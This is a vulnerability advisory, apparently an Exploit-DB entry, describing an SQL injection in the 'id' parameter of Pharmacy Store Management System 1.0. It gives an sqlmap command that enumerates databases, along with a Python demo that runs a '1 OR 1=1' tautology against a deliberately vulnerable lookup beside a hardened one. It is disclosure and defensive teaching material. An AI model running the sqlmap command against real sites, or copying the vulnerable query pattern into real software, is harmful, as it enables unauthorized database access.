Vendor: Pharmacy Store Management System
By: Aydın Baran Ertemir
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Pharmacy Store Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:pharmacy_store_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Date: 2020

Pharmacy Store Management System 1.0 – ‘id’ SQL Injection

The 'id' parameter of the admin/edituser page in Pharmacy Store Management System 1.0 is used in an SQL query without being sanitized, so an attacker can inject SQL through it. The original submission demonstrates the issue with SQLMap, which enumerates the databases and tables reachable through the injection point; the command given is 'sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input, including the 'id' parameter here, should be validated and filtered before it is used in an SQL query.
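The following Python script is an added illustration of the mitigation above; it is not code from the Pharmacy Store Management System (which is written in PHP) or from the advisory author. It builds a constructed in-memory SQLite database with a users table, shows an edituser-style lookup that concatenates the raw 'id' value into the query text, and sets beside it a hardened version that first validates 'id' as a positive integer and then passes it to the database as a bound parameter. The table layout, the function names and the sample rows are assumptions made for the demonstration.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed sample database standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 'admin');
        INSERT INTO users VALUES (2, 'bob', 'pharmacist');
        """
    )
    return conn


def edit_user_vulnerable(conn, raw_id):
    """Lookup in the style of the affected page: the raw 'id' string is glued
    into the SQL text, so whatever the client sends becomes part of the query."""
    sql = "SELECT id, username, role FROM users WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def validate_id(raw_id):
    """Input validation step: accept only a positive decimal integer.
    Returns the integer, or None when the value does not match."""
    if isinstance(raw_id, str) and re.fullmatch(r"[1-9][0-9]*", raw_id):
        return int(raw_id)
    return None


def edit_user_hardened(conn, raw_id):
    """Hardened lookup: validate first, then bind the value as a parameter so
    the database treats it as data rather than as SQL text."""
    user_id = validate_id(raw_id)
    if user_id is None:
        raise ValueError("invalid id parameter")
    sql = "SELECT id, username, role FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    # A normal request behaves the same in both versions.
    print("vulnerable, id=1 :", edit_user_vulnerable(db, "1"))
    print("hardened,   id=1 :", edit_user_hardened(db, "1"))
    # A tautology in the id parameter makes the concatenating version return
    # every row; the hardened version rejects the value before any query runs.
    print("vulnerable, tautology:", edit_user_vulnerable(db, "1 OR 1=1"))
    try:
        edit_user_hardened(db, "1 OR 1=1")
    except ValueError as exc:
        print("hardened,   tautology: rejected ->", exc)
```

Of the two measures, parameter binding is the one that removes the injection path on its own; the integer check is defence in depth that also gives a clean place to log and reject malformed 'id' values, which is a useful detection signal for scans like the SQLMap run described above.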

Exploit-DB raw data:

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 1.12.2020
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch